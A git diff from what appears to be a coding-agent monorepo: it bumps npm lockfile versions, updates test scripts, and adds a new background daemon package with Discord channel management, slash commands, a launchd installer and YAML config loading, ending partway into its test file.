"https://registry.npmjs.org/magic-string/-/magic-string-0.30.21.tgz", @@ -7087,9 +7390,9 @@ } }, "node_modules/path-expression-matcher": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.1.3.tgz", - "integrity": "sha512-qdVgY8KXmVdJZRSS1JdEPOKPdTiEK/pi0RkcT2sw1RhXxohdujUlJFPuS1TSkevZ9vzd3ZlL7ULl1MHGTApKzQ==", + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.4.0.tgz", + "integrity": "sha512-s4DQMxIdhj3jLFWd9LxHOplj4p9yQ4ffMGowFf3cpEgrrJjEhN0V5nxw4Ye1EViAGDoL4/1AeO6qHpqYPOzE4Q==", "funding": [ { "type": "github", @@ -7127,9 +7430,9 @@ } }, "node_modules/path-to-regexp": { - "version": "8.3.0", - "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-8.3.0.tgz", - "integrity": "sha512-7jdwVIRtsP8MYpdXSwOS0YdD0Du+qOoF/AEPIt88PcCFrZCzx41oxku1jD88hZBwbNUIEfpqvuhjFaMAqMTWnA==", + "version": "8.4.2", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-8.4.2.tgz", + "integrity": "sha512-qRcuIdP69NPm4qbACK+aDogI5CBDMi1jKe0ry5rSQJz8JVLsC7jV8XpiJjGRLLol3N+R5ihGYcrPLTno6pAdBA==", "license": "MIT", "funding": { "type": "opencollective", @@ -7149,9 +7452,9 @@ "license": "ISC" }, "node_modules/picomatch": { - "version": "4.0.3", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.3.tgz", - "integrity": "sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q==", + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", + "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", "license": "MIT", "engines": { "node": ">=12" @@ -7999,9 +8302,9 @@ } }, "node_modules/strnum": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.0.tgz", - "integrity": "sha512-Y7Bj8XyJxnPAORMZj/xltsfo55uOiyHcU2tnAVzHUnSJR/KsEX+9RoDeXEnsXtl/CX4fAcrt64gZ13aGaWPeBg==", + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz", + "integrity": "sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==", "funding": [ { "type": "github", @@ -8139,6 +8442,12 @@ "integrity": "sha512-FPAhNPFMrkwz76P7cdjdmiShwMynZYN6SgOujD1urY4oNm80Ou9oMdmbR45LotcKOXoy7wSmHkRFE6Mxbrhefw==", "license": "MIT" }, + "node_modules/ts-mixer": { + "version": "6.0.4", + "resolved": "https://registry.npmjs.org/ts-mixer/-/ts-mixer-6.0.4.tgz", + "integrity": "sha512-ufKpbmrugz5Aou4wcr5Wc1UUFWOLhq+Fm6qa6P0w0K5Qw2yhaUoiWszhCVuNQyNwrlGiscHOmqYoAox1PtvgjA==", + "license": "MIT" + }, "node_modules/tslib": { "version": "2.8.1", "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", @@ -8295,9 +8604,9 @@ } }, "node_modules/vite": { - "version": "7.3.1", - "resolved": "https://registry.npmjs.org/vite/-/vite-7.3.1.tgz", - "integrity": "sha512-w+N7Hifpc3gRjZ63vYBXA56dvvRlNWRczTdmCBBa+CotUzAPf5b7YMdMR/8CQoeYE5LX3W4wj6RYTgonm1b9DA==", + "version": "7.3.2", + "resolved": "https://registry.npmjs.org/vite/-/vite-7.3.2.tgz", + "integrity": "sha512-Bby3NOsna2jsjfLVOHKes8sGwgl4TT0E6vvpYgnAYDIF/tie7MRaFthmKuHx1NSXjiTueXH3do80FMQgvEktRg==", "dev": true, "license": "MIT", "peer": true, @@ -8991,9 +9300,9 @@ "license": "ISC" }, "node_modules/yaml": { - "version": "2.8.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.8.2.tgz", - "integrity": "sha512-mplynKqc1C2hTVYxd0PU2xQAc22TI1vShAYGksCCfxbn/dFwnHTNi1bvYsBTkhdUNtGIf5xNOg938rrSSYvS9A==", + "version": "2.8.3", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.8.3.tgz", + "integrity": "sha512-AvbaCLOO2Otw/lW5bmh9d/WEdcDFdQp2Z2ZUH3pX9U2ihyUY0nvLv7J6TrWowklRGPYbB/IuIMfYgxaCPg5Bpg==", "license": "ISC", "bin": { "yaml": "bin.mjs" @@ -9116,6 +9425,66 @@ } } }, + "packages/daemon": { + "name": "@gsd-build/daemon", + "version": "0.1.0", + "license": "MIT", + "dependencies": { + "@anthropic-ai/sdk": "^0.52.0", + "@gsd-build/rpc-client": "^2.52.0", + "discord.js": "^14.25.1", + "yaml": "^2.8.0", + "zod": "^3.24.0" + }, + "bin": { + "gsd-daemon": "dist/cli.js" + }, + "devDependencies": { + "@types/node": "^24.12.0", + "typescript": "^5.4.0" + }, + "engines": { + "node": ">=22.0.0" + } + }, + "packages/daemon/node_modules/@anthropic-ai/sdk": { + "version": "0.52.0", + "resolved": "https://registry.npmjs.org/@anthropic-ai/sdk/-/sdk-0.52.0.tgz", + "integrity": "sha512-d4c+fg+xy9e46c8+YnrrgIQR45CZlAi7PwdzIfDXDM6ACxEZli1/fxhURsq30ZpMZy6LvSkr41jGq5aF5TD7rQ==", + "license": "MIT", + "bin": { + "anthropic-ai-sdk": "bin/cli" + } + }, + "packages/daemon/node_modules/zod": { + "version": "3.25.76", + "resolved": "https://registry.npmjs.org/zod/-/zod-3.25.76.tgz", + "integrity": "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/colinhacks" + } + }, + "packages/mcp-server": { + "name": "@gsd-build/mcp-server", + "version": "2.52.0", + "license": "MIT", + "dependencies": { + "@gsd-build/rpc-client": "^2.52.0", + "@modelcontextprotocol/sdk": "^1.27.1", + "zod": "^4.0.0" + }, + "bin": { + "gsd-mcp-server": "dist/cli.js" + }, + "devDependencies": { + "@types/node": "^24.12.0", + "typescript": "^5.4.0" + }, + "engines": { + "node": ">=22.0.0" + } + }, "packages/native": { "name": "@gsd/native", "version": "0.1.0", @@ -9166,7 +9535,7 @@ }, "packages/pi-coding-agent": { "name": "@gsd/pi-coding-agent", - "version": "2.40.0", + "version": "2.66.1", "dependencies": { "@mariozechner/jiti": "^2.6.2", "@silvia-odwyer/photon-node": "^0.3.4", @@ -9208,6 +9577,14 @@ "koffi": "^2.9.0" } }, + "packages/rpc-client": { + "name": "@gsd-build/rpc-client", + "version": "2.52.0", + "license": "MIT", + "engines": { + "node": ">=22.0.0" + } + }, "studio": { "name": "@gsd/studio", "version": "0.0.0", diff --git a/package.json b/package.json index 2ff80fd7a..949928fb7 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "gsd-pi", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD — Get Shit Done coding agent", "license": "MIT", "repository": { @@ -53,10 +53,13 @@ "copy-resources": "node scripts/copy-resources.cjs", "copy-themes": "node scripts/copy-themes.cjs", "copy-export-html": "node scripts/copy-export-html.cjs", - "test:unit": "node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/*.test.ts src/resources/extensions/gsd/tests/*.test.mjs src/tests/*.test.ts", + "test:compile": "node scripts/compile-tests.mjs", + "test:unit": "npm run test:compile && node --import ./scripts/dist-test-resolve.mjs --experimental-test-isolation=process --test-reporter=./scripts/test-reporter-compact.mjs --test 'dist-test/src/tests/*.test.js' 'dist-test/src/resources/extensions/gsd/tests/*.test.js' 'dist-test/src/resources/extensions/gsd/tests/*.test.mjs' 'dist-test/src/resources/extensions/shared/tests/*.test.js' 'dist-test/src/resources/extensions/claude-code-cli/tests/*.test.js' 'dist-test/src/resources/extensions/github-sync/tests/*.test.js' 'dist-test/src/resources/extensions/universal-config/tests/*.test.js' 'dist-test/src/resources/extensions/voice/tests/*.test.js' 'dist-test/src/resources/extensions/mcp-client/tests/*.test.js'", + "test:packages": "node --test packages/pi-coding-agent/dist/core/*.test.js", "test:marketplace": "GSD_TEST_CLONE_MARKETPLACES=1 node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/claude-import-tui.test.ts src/resources/extensions/gsd/tests/plugin-importer-live.test.ts src/tests/marketplace-discovery.test.ts", - "test:coverage": "c8 --reporter=text --reporter=lcov --exclude='src/resources/extensions/gsd/tests/**' --exclude='src/tests/**' --exclude='scripts/**' --exclude='native/**' --exclude='node_modules/**' --check-coverage --statements=50 --lines=50 --branches=20 --functions=20 node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/*.test.ts src/resources/extensions/gsd/tests/*.test.mjs src/tests/*.test.ts", - "test:integration": "node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/*integration*.test.ts src/tests/integration/*.test.ts", + "test:coverage": "c8 --reporter=text --reporter=lcov --exclude='src/resources/extensions/gsd/tests/**' --exclude='src/tests/**' --exclude='scripts/**' --exclude='native/**' --exclude='node_modules/**' --check-coverage --statements=40 --lines=40 --branches=20 --functions=20 node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --experimental-test-isolation=process --test src/resources/extensions/gsd/tests/*.test.ts src/resources/extensions/gsd/tests/*.test.mjs src/tests/*.test.ts src/resources/extensions/shared/tests/*.test.ts", + "test:integration": "node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test 'src/tests/integration/*.test.ts' 'src/resources/extensions/gsd/tests/integration/*.test.ts' 'src/resources/extensions/async-jobs/*.test.ts' 'src/resources/extensions/browser-tools/tests/*.test.mjs'", + "pretest": "npm run typecheck:extensions", "test": "npm run test:unit && npm run test:integration", "test:smoke": "node --experimental-strip-types tests/smoke/run.ts", "test:fixtures": "node --experimental-strip-types tests/fixtures/run.ts", @@ -134,10 +137,12 @@ "@types/node": "^24.12.0", "@types/picomatch": "^4.0.2", "c8": "^11.0.0", + "esbuild": "^0.25.12", "jiti": "^2.6.1", "typescript": "^5.4.0" }, "optionalDependencies": { + "@anthropic-ai/claude-agent-sdk": "^0.2.83", "@gsd-build/engine-darwin-arm64": ">=2.10.2", "@gsd-build/engine-darwin-x64": ">=2.10.2", "@gsd-build/engine-linux-arm64-gnu": ">=2.10.2", diff --git a/packages/daemon/package.json b/packages/daemon/package.json new file mode 100644 index 000000000..74060981f --- /dev/null +++ b/packages/daemon/package.json @@ -0,0 +1,48 @@ +{ + "name": "@gsd-build/daemon", + "version": "0.1.0", + "description": "GSD daemon — background process for project monitoring and Discord integration", + "license": "MIT", + "repository": { + "type": "git", + "url": "https://github.com/gsd-build/gsd-2.git", + "directory": "packages/daemon" + }, + "publishConfig": { + "access": "public" + }, + "type": "module", + "main": "./dist/index.js", + "types": "./dist/index.d.ts", + "exports": { + ".": { + "types": "./dist/index.d.ts", + "import": "./dist/index.js" + } + }, + "bin": { + "gsd-daemon": "./dist/cli.js" + }, + "scripts": { + "build": "tsc", + "test": "node --test dist/daemon.test.js" + }, + "dependencies": { + "@anthropic-ai/sdk": "^0.52.0", + "@gsd-build/rpc-client": "^2.52.0", + "discord.js": "^14.25.1", + "yaml": "^2.8.0", + "zod": "^3.24.0" + }, + "devDependencies": { + "@types/node": "^24.12.0", + "typescript": "^5.4.0" + }, + "engines": { + "node": ">=22.0.0" + }, + "files": [ + "dist", + "!dist/**/*.test.*" + ] +} diff --git a/packages/daemon/src/channel-manager.ts b/packages/daemon/src/channel-manager.ts new file mode 100644 index 000000000..b0ae1604c --- /dev/null +++ b/packages/daemon/src/channel-manager.ts @@ -0,0 +1,223 @@ +/** + * ChannelManager — manages per-project Discord text channels under a + * 'GSD Projects' category, with archive support. + * + * Pure helper `sanitizeChannelName` exported separately for testability. + */ + +import { + ChannelType, + PermissionFlagsBits, + type Guild, + type CategoryChannel, + type TextChannel, + type GuildBasedChannel, +} from 'discord.js'; +import type { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +const DEFAULT_CATEGORY_NAME = 'GSD Projects'; +const ARCHIVE_CATEGORY_NAME = 'GSD Archive'; +const CHANNEL_PREFIX = 'gsd-'; +const MAX_CHANNEL_NAME_LENGTH = 100; // Discord's limit + +// --------------------------------------------------------------------------- +// Pure helpers — exported for testability +// --------------------------------------------------------------------------- + +/** + * Sanitize a project directory path into a valid Discord channel name. + * + * - Takes the basename of the path + * - Lowercases + * - Replaces non-alphanumeric (except hyphens) with hyphens + * - Collapses consecutive hyphens + * - Trims leading/trailing hyphens + * - Prefixes with 'gsd-' + * - Caps total length at 100 chars (Discord limit) + * + * Returns 'gsd-unnamed' for empty/whitespace-only inputs. + */ +export function sanitizeChannelName(projectDir: string): string { + // Extract basename — handle both forward and back slashes + const parts = projectDir.replace(/\\/g, '/').split('/'); + let basename = parts[parts.length - 1] ?? ''; + + // Trim whitespace + basename = basename.trim(); + + // Fallback for empty basename + if (!basename) { + return 'gsd-unnamed'; + } + + // Lowercase + let name = basename.toLowerCase(); + + // Replace non-alphanumeric (except hyphens) with hyphens + name = name.replace(/[^a-z0-9-]/g, '-'); + + // Collapse consecutive hyphens + name = name.replace(/-{2,}/g, '-'); + + // Trim leading/trailing hyphens + name = name.replace(/^-+|-+$/g, ''); + + // Fallback if nothing remains after sanitization + if (!name) { + return 'gsd-unnamed'; + } + + // Prefix + const prefixed = `${CHANNEL_PREFIX}${name}`; + + // Cap at max length + if (prefixed.length > MAX_CHANNEL_NAME_LENGTH) { + // Truncate and remove any trailing hyphen from the cut + return prefixed.slice(0, MAX_CHANNEL_NAME_LENGTH).replace(/-+$/, ''); + } + + return prefixed; +} + +// --------------------------------------------------------------------------- +// ChannelManager class +// --------------------------------------------------------------------------- + +export interface ChannelManagerOptions { + guild: Guild; + logger: Logger; + categoryName?: string; +} + +export class ChannelManager { + private readonly guild: Guild; + private readonly logger: Logger; + private readonly categoryName: string; + + private categoryCache: CategoryChannel | null = null; + private archiveCategoryCache: CategoryChannel | null = null; + + constructor(opts: ChannelManagerOptions) { + this.guild = opts.guild; + this.logger = opts.logger; + this.categoryName = opts.categoryName ?? DEFAULT_CATEGORY_NAME; + } + + /** + * Find or create the project category channel. + * Caches the result — subsequent calls return the cached category. + */ + async resolveCategory(): Promise { + if (this.categoryCache) { + return this.categoryCache; + } + + const existing = this.findCategoryByName(this.categoryName); + if (existing) { + this.categoryCache = existing; + this.logger.debug('category resolved from cache', { name: this.categoryName, id: existing.id }); + return existing; + } + + // Create the category + const created = await this.guild.channels.create({ + name: this.categoryName, + type: ChannelType.GuildCategory, + }); + + this.categoryCache = created as CategoryChannel; + this.logger.info('category created', { name: this.categoryName, id: created.id }); + return this.categoryCache; + } + + /** + * Create a text channel for a project under the GSD Projects category. + * Channel name is derived from the project directory path. + */ + async createProjectChannel(projectDir: string): Promise { + const name = sanitizeChannelName(projectDir); + const category = await this.resolveCategory(); + + const channel = await this.guild.channels.create({ + name, + type: ChannelType.GuildText, + parent: category.id, + }); + + this.logger.info('project channel created', { + name, + channelId: channel.id, + categoryId: category.id, + projectDir, + }); + + return channel as TextChannel; + } + + /** + * Archive a channel by moving it to the 'GSD Archive' category and + * setting permission overwrite to deny ViewChannel for @everyone. + */ + async archiveChannel(channelId: string): Promise { + const archive = await this.resolveArchiveCategory(); + + const channel = this.guild.channels.cache.get(channelId); + if (!channel) { + this.logger.warn('archive target not found', { channelId }); + return; + } + + if (!('edit' in channel) || typeof channel.edit !== 'function') { + this.logger.warn('archive target is not editable', { channelId, type: channel.type }); + return; + } + + await channel.edit({ + parent: archive.id, + permissionOverwrites: [ + { + id: this.guild.id, // @everyone role ID matches guild ID + deny: [PermissionFlagsBits.ViewChannel], + }, + ], + }); + + this.logger.info('channel archived', { channelId, archiveCategoryId: archive.id }); + } + + // --------------------------------------------------------------------------- + // Private helpers + // --------------------------------------------------------------------------- + + private findCategoryByName(name: string): CategoryChannel | null { + const match = this.guild.channels.cache.find( + (ch: GuildBasedChannel) => ch.type === ChannelType.GuildCategory && ch.name === name, + ); + return (match as CategoryChannel) ?? null; + } + + private async resolveArchiveCategory(): Promise { + if (this.archiveCategoryCache) { + return this.archiveCategoryCache; + } + + const existing = this.findCategoryByName(ARCHIVE_CATEGORY_NAME); + if (existing) { + this.archiveCategoryCache = existing; + return existing; + } + + const created = await this.guild.channels.create({ + name: ARCHIVE_CATEGORY_NAME, + type: ChannelType.GuildCategory, + }); + + this.archiveCategoryCache = created as CategoryChannel; + this.logger.info('archive category created', { name: ARCHIVE_CATEGORY_NAME, id: created.id }); + return this.archiveCategoryCache; + } +} diff --git a/packages/daemon/src/cli.ts b/packages/daemon/src/cli.ts new file mode 100644 index 000000000..5449ad761 --- /dev/null +++ b/packages/daemon/src/cli.ts @@ -0,0 +1,96 @@ +#!/usr/bin/env node +import { parseArgs } from 'node:util'; +import { fileURLToPath } from 'node:url'; +import { resolve, dirname } from 'node:path'; +import { resolveConfigPath, loadConfig } from './config.js'; +import { Logger } from './logger.js'; +import { Daemon } from './daemon.js'; +import { install, uninstall, status } from './launchd.js'; + +const USAGE = `Usage: gsd-daemon [options] + +Options: + --config Path to YAML config file (default: ~/.gsd/daemon.yaml) + --verbose Print log entries to stderr in addition to the log file + --install Install the launchd LaunchAgent (auto-starts on login) + --uninstall Uninstall the launchd LaunchAgent + --status Show launchd agent status (registered, PID, exit code) + --help Show this help message and exit +`; + +async function main(): Promise { + const { values } = parseArgs({ + options: { + config: { type: 'string', short: 'c' }, + verbose: { type: 'boolean', short: 'v', default: false }, + install: { type: 'boolean', default: false }, + uninstall: { type: 'boolean', default: false }, + status: { type: 'boolean', default: false }, + help: { type: 'boolean', short: 'h', default: false }, + }, + strict: true, + }); + + if (values.help) { + process.stdout.write(USAGE); + process.exit(0); + } + + // --- launchd commands (dispatch before Daemon creation) --- + + if (values.install) { + const configPath = resolveConfigPath(values.config); + const thisFile = fileURLToPath(import.meta.url); + const scriptPath = resolve(dirname(thisFile), 'cli.js'); + + install({ + nodePath: process.execPath, + scriptPath, + configPath, + }); + process.stdout.write('gsd-daemon: launchd agent installed and loaded.\n'); + process.exit(0); + } + + if (values.uninstall) { + uninstall(); + process.stdout.write('gsd-daemon: launchd agent uninstalled.\n'); + process.exit(0); + } + + if (values.status) { + const result = status(); + if (!result.registered) { + process.stdout.write('gsd-daemon: not registered with launchd.\n'); + } else if (result.pid != null) { + process.stdout.write( + `gsd-daemon: running (PID ${result.pid}, last exit status: ${result.lastExitStatus ?? 'n/a'})\n`, + ); + } else { + process.stdout.write( + `gsd-daemon: registered but not running (last exit status: ${result.lastExitStatus ?? 'n/a'})\n`, + ); + } + process.exit(0); + } + + // --- normal daemon start --- + + const configPath = resolveConfigPath(values.config); + const config = loadConfig(configPath); + + const logger = new Logger({ + filePath: config.log.file, + level: config.log.level, + verbose: values.verbose, + }); + + const daemon = new Daemon(config, logger); + await daemon.start(); +} + +main().catch((err: unknown) => { + const msg = err instanceof Error ? err.message : String(err); + process.stderr.write(`gsd-daemon: fatal: ${msg}\n`); + process.exit(1); +}); diff --git a/packages/daemon/src/commands.ts b/packages/daemon/src/commands.ts new file mode 100644 index 000000000..d46d92269 --- /dev/null +++ b/packages/daemon/src/commands.ts @@ -0,0 +1,110 @@ +/** + * Slash command definitions, guild-scoped registration, and status formatting. + * + * Commands are registered per-guild (not globally) for instant availability. + * Registration failures are non-fatal — the bot continues without slash commands. + */ + +import { + SlashCommandBuilder, + REST, + Routes, + type RESTPostAPIChatInputApplicationCommandsJSONBody, +} from 'discord.js'; +import type { ManagedSession } from './types.js'; +import type { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// Command definitions +// --------------------------------------------------------------------------- + +/** + * Build the array of slash command JSON payloads for guild registration. + */ +export function buildCommands(): RESTPostAPIChatInputApplicationCommandsJSONBody[] { + return [ + new SlashCommandBuilder() + .setName('gsd-status') + .setDescription('Show status of all active GSD sessions') + .toJSON(), + new SlashCommandBuilder() + .setName('gsd-start') + .setDescription('Start a new GSD session') + .toJSON(), + new SlashCommandBuilder() + .setName('gsd-stop') + .setDescription('Stop a running GSD session') + .toJSON(), + new SlashCommandBuilder() + .setName('gsd-verbose') + .setDescription('Set event verbosity level for this channel') + .addStringOption((option) => + option + .setName('level') + .setDescription('Verbosity level') + .setRequired(false) + .addChoices( + { name: 'default', value: 'default' }, + { name: 'verbose', value: 'verbose' }, + { name: 'quiet', value: 'quiet' }, + ), + ) + .toJSON(), + ]; +} + +// --------------------------------------------------------------------------- +// Guild-scoped registration +// --------------------------------------------------------------------------- + +/** + * Register slash commands for a specific guild via PUT. + * Non-fatal: logs errors and returns false on failure. + */ +export async function registerGuildCommands( + rest: REST, + clientId: string, + guildId: string, + commands: RESTPostAPIChatInputApplicationCommandsJSONBody[], + logger?: Logger, +): Promise { + try { + await rest.put( + Routes.applicationGuildCommands(clientId, guildId), + { body: commands }, + ); + logger?.info('commands registered', { count: commands.length, guildId }); + return true; + } catch (err) { + const message = err instanceof Error ? err.message : String(err); + logger?.warn('command registration failed', { + guildId, + error: message, + }); + return false; + } +} + +// --------------------------------------------------------------------------- +// Status formatting +// --------------------------------------------------------------------------- + +/** + * Format session list for /gsd-status reply. + * Shows projectName, status, duration, and cost for each session. + * Returns 'No active sessions.' if the array is empty. + */ +export function formatSessionStatus(sessions: ManagedSession[]): string { + if (sessions.length === 0) { + return 'No active sessions.'; + } + + const lines = sessions.map((s) => { + const durationMs = Date.now() - s.startTime; + const durationMin = Math.floor(durationMs / 60_000); + const cost = s.cost.totalCost.toFixed(4); + return `• **${s.projectName}** — ${s.status} (${durationMin}m, $${cost})`; + }); + + return lines.join('\n'); +} diff --git a/packages/daemon/src/config.ts b/packages/daemon/src/config.ts new file mode 100644 index 000000000..c1dddbbd6 --- /dev/null +++ b/packages/daemon/src/config.ts @@ -0,0 +1,137 @@ +import { readFileSync, existsSync } from 'node:fs'; +import { homedir } from 'node:os'; +import { resolve } from 'node:path'; +import { parse as parseYaml } from 'yaml'; +import type { DaemonConfig, LogLevel } from './types.js'; + +const VALID_LOG_LEVELS: ReadonlySet = new Set(['debug', 'info', 'warn', 'error']); + +/** Expand leading ~ to the user's home directory. */ +function expandTilde(p: string): string { + if (p.startsWith('~/') || p === '~') { + return resolve(homedir(), p.slice(2) || '.'); + } + return p; +} + +/** Default config values when no file is present or fields are missing. */ +function defaults(): DaemonConfig { + return { + discord: undefined, + projects: { scan_roots: [] }, + log: { + file: resolve(homedir(), '.gsd', 'daemon.log'), + level: 'info', + max_size_mb: 50, + }, + }; +} + +/** + * Resolve the config file path. + * Priority: explicit CLI arg → GSD_DAEMON_CONFIG env → ~/.gsd/daemon.yaml + */ +export function resolveConfigPath(cliPath?: string): string { + if (cliPath) return expandTilde(cliPath); + const envPath = process.env['GSD_DAEMON_CONFIG']; + if (envPath) return expandTilde(envPath); + return resolve(homedir(), '.gsd', 'daemon.yaml'); +} + +/** + * Validate and normalise a raw parsed object into a DaemonConfig. + * Missing/invalid fields are filled with defaults. Invalid log level falls back to 'info'. + */ +export function validateConfig(raw: unknown): DaemonConfig { + const def = defaults(); + + if (raw == null || typeof raw !== 'object') return def; + const obj = raw as Record; + + // --- discord --- + let discord: DaemonConfig['discord'] = undefined; + if (obj['discord'] != null && typeof obj['discord'] === 'object') { + const d = obj['discord'] as Record; + discord = { + token: typeof d['token'] === 'string' ? d['token'] : '', + guild_id: typeof d['guild_id'] === 'string' ? d['guild_id'] : '', + owner_id: typeof d['owner_id'] === 'string' ? d['owner_id'] : '', + ...(typeof d['dm_on_blocker'] === 'boolean' ? { dm_on_blocker: d['dm_on_blocker'] } : {}), + ...(typeof d['control_channel_id'] === 'string' ? { control_channel_id: d['control_channel_id'] } : {}), + }; + + // Parse orchestrator sub-block + if (d['orchestrator'] != null && typeof d['orchestrator'] === 'object') { + const orc = d['orchestrator'] as Record; + discord.orchestrator = { + ...(typeof orc['model'] === 'string' ? { model: orc['model'] } : {}), + ...(typeof orc['max_tokens'] === 'number' && orc['max_tokens'] > 0 ? { max_tokens: orc['max_tokens'] } : {}), + }; + } + } + + // --- projects --- + let scanRoots: string[] = []; + if (obj['projects'] != null && typeof obj['projects'] === 'object') { + const p = obj['projects'] as Record; + if (Array.isArray(p['scan_roots'])) { + scanRoots = (p['scan_roots'] as unknown[]) + .filter((s): s is string => typeof s === 'string') + .map(expandTilde); + } + } + + // --- log --- + let logFile = def.log.file; + let logLevel: LogLevel = def.log.level; + let maxSizeMb = def.log.max_size_mb; + + if (obj['log'] != null && typeof obj['log'] === 'object') { + const l = obj['log'] as Record; + if (typeof l['file'] === 'string') logFile = expandTilde(l['file']); + if (typeof l['level'] === 'string') { + logLevel = VALID_LOG_LEVELS.has(l['level']) ? (l['level'] as LogLevel) : 'info'; + } + if (typeof l['max_size_mb'] === 'number' && l['max_size_mb'] > 0) { + maxSizeMb = l['max_size_mb']; + } + } + + // --- env override: DISCORD_BOT_TOKEN --- + const envToken = process.env['DISCORD_BOT_TOKEN']; + if (envToken) { + if (!discord) { + discord = { token: envToken, guild_id: '', owner_id: '' }; + } else { + discord = { ...discord, token: envToken }; + } + } + + return { + discord, + projects: { scan_roots: scanRoots }, + log: { file: logFile, level: logLevel, max_size_mb: maxSizeMb }, + }; +} + +/** + * Load and validate a DaemonConfig from a YAML file. + * If the file doesn't exist, returns defaults. If the file is malformed YAML, throws. + */ +export function loadConfig(configPath: string): DaemonConfig { + if (!existsSync(configPath)) { + // Still apply env-var overrides even when file is missing + return validateConfig(null); + } + + const raw = readFileSync(configPath, 'utf-8'); + let parsed: unknown; + try { + parsed = parseYaml(raw); + } catch (err: unknown) { + const msg = err instanceof Error ? err.message : String(err); + throw new Error(`Failed to parse YAML config at ${configPath}: ${msg}`); + } + + return validateConfig(parsed); +} diff --git a/packages/daemon/src/daemon.test.ts b/packages/daemon/src/daemon.test.ts new file mode 100644 index 000000000..8519bcaf7 --- /dev/null +++ b/packages/daemon/src/daemon.test.ts @@ -0,0 +1,763 @@ +import { describe, it, afterEach, before, after } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, writeFileSync, readFileSync, rmSync, existsSync, mkdirSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir, homedir } from 'node:os'; +import { randomUUID } from 'node:crypto'; +import { execFileSync, spawn } from 'node:child_process'; +import { fileURLToPath } from 'node:url'; +import { dirname } from 'node:path'; +import { resolveConfigPath, loadConfig, validateConfig } from './config.js'; +import { Logger } from './logger.js'; +import { Daemon } from './daemon.js'; +import { SessionManager } from './session-manager.js'; +import type { DaemonConfig, LogEntry } from './types.js'; + +// ---------- helpers ---------- + +function tmpDir(): string { + return mkdtempSync(join(tmpdir(), `daemon-test-${randomUUID().slice(0, 8)}-`)); +} + +const cleanupDirs: string[] = []; +afterEach(() => { + while (cleanupDirs.length) { + const d = cleanupDirs.pop()!; + if (existsSync(d)) rmSync(d, { recursive: true, force: true }); + } +}); + +// ---------- config ---------- + +describe('resolveConfigPath', () => { + it('prefers explicit CLI path', () => { + const p = resolveConfigPath('/custom/config.yaml'); + assert.equal(p, '/custom/config.yaml'); + }); + + it('expands ~ in CLI path', () => { + const p = resolveConfigPath('~/my-daemon.yaml'); + assert.ok(p.startsWith(homedir())); + assert.ok(p.endsWith('my-daemon.yaml')); + }); + + it('falls back to GSD_DAEMON_CONFIG env var', () => { + const prev = process.env['GSD_DAEMON_CONFIG']; + try { + process.env['GSD_DAEMON_CONFIG'] = '/env/path.yaml'; + const p = resolveConfigPath(); + assert.equal(p, '/env/path.yaml'); + } finally { + if (prev === undefined) delete process.env['GSD_DAEMON_CONFIG']; + else process.env['GSD_DAEMON_CONFIG'] = prev; + } + }); + + it('defaults to ~/.gsd/daemon.yaml', () => { + const prev = process.env['GSD_DAEMON_CONFIG']; + try { + delete process.env['GSD_DAEMON_CONFIG']; + const p = resolveConfigPath(); + assert.equal(p, join(homedir(), '.gsd', 'daemon.yaml')); + } finally { + if (prev !== undefined) process.env['GSD_DAEMON_CONFIG'] = prev; + } + }); +}); + +describe('loadConfig', () => { + // Save and clear DISCORD_BOT_TOKEN for this suite — env override interferes with file-token assertions + let savedToken: string | undefined; + before(() => { + savedToken = process.env['DISCORD_BOT_TOKEN']; + delete process.env['DISCORD_BOT_TOKEN']; + }); + afterEach(() => {}); // cleanup dirs handled by top-level afterEach + // Restore after all tests in this suite + after(() => { + if (savedToken !== undefined) process.env['DISCORD_BOT_TOKEN'] = savedToken; + }); + + it('parses valid YAML config', () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const configPath = join(dir, 'daemon.yaml'); + writeFileSync(configPath, ` +discord: + token: "test-token-123" + guild_id: "g1" + owner_id: "o1" +projects: + scan_roots: + - ~/projects + - /absolute/path +log: + file: ~/logs/daemon.log + level: debug + max_size_mb: 100 +`); + const cfg = loadConfig(configPath); + 